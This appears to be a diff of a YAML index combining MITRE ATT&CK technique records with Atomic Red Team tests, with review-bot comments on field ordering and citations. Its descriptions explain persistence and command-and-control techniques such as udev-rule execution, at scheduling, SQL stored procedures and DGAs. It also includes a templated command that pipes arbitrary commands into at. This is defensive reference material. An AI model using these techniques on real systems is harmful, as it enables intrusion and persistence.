+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
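Review bot: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are only being moved from the bottom of the T1078.004 object (removed again a few hunks below) to their alphabetical position; the substantive change in this hunk is the added contributor line `- Arun Seelagan, CISA`. A stable key order in the generator would keep future diffs to the lines that actually changed.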
@@ -73495,13 +73873,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -73532,9 +73910,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -73735,10 +74110,10 @@ persistence:
'
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -73801,7 +74176,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -73835,8 +74210,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -73845,6 +74220,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
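Review bot: the new Cybereason reference URL ends in `#blog-subscribe`, which is the page's newsletter anchor rather than part of the article location; strip it to `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The `source_name` does match the `(Citation: Malicious Life by Cybereason)` added to the T1053.002 description earlier in this patch, so the citation resolves.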
@@ -73857,7 +74236,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -73922,7 +74300,7 @@ persistence:
command: 'echo "#{at_command}" | at #{time_spec}'
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -73935,6 +74313,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -73971,17 +74350,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -74027,9 +74406,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
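Review bot: the diff alignment here is misleading but the result is correct: the unchanged `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines now terminate the new T1546.017 object rather than T1556, and T1556 received its own copies of both keys in the earlier hunks (`+ x_mitre_attack_spec_version: 3.2.0`, `+ x_mitre_modified_by_ref: …`). Two small data nits in the new object: in `x_mitre_detection` the path `/usr/lib/udev/rules.d/` is the only one of the three without backticks, and the quoted string ends with a trailing space before the closing quote (`2024) '`), which will survive into the rendered detection text.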
@@ -74066,7 +74501,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -74090,7 +74525,6 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -74130,46 +74564,7 @@ persistence:
elevation_required: true
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -74192,20 +74587,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
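Review bot: the T1505.001 hunk silently drops `x_mitre_permissions_required` (`Administrator`, `SYSTEM`, `root`) with no replacement, while the other fields are only reordered; that is consistent with the field being retired upstream, but it is a data loss for any consumer that filters on it and deserves a mention in the commit message. The two NetSPI references also change their `Retrieved` dates to September 12, 2024 together with the URL move to `netspi.com/blog/technical-blog/…`; that is reasonable since the citation was re-verified at the new location.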
@@ -74235,7 +74667,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -74259,12 +74691,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
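Review bot: for T1556.004 this hunk removes `x_mitre_attack_spec_version: 2.1.0` along with `spec_version`, and unlike T1078.004 or T1556 there is no corresponding `+ x_mitre_attack_spec_version` line; either the key was re-added outside the visible context or this object now lacks it entirely. Check the regenerated file before merging, since other entries still carry the field.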
@@ -74348,11 +74778,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -74404,9 +74833,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -74705,7 +75133,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -74743,8 +75171,6 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
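Review bot: same concern as for T1556.004: `x_mitre_attack_spec_version: 2.1.0` is removed from T1574.012 with no replacement in this hunk, so the object may end up without the field while `x_mitre_permissions_required` (`User`, `Administrator`) is kept; confirm the key is present elsewhere in the object.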
@@ -74880,7 +75306,7 @@ persistence:
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -74943,7 +75369,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -75001,7 +75426,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests:
- name: Base64 Encoded data.
@@ -75091,92 +75515,91 @@ command-and-control:
name: powershell
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
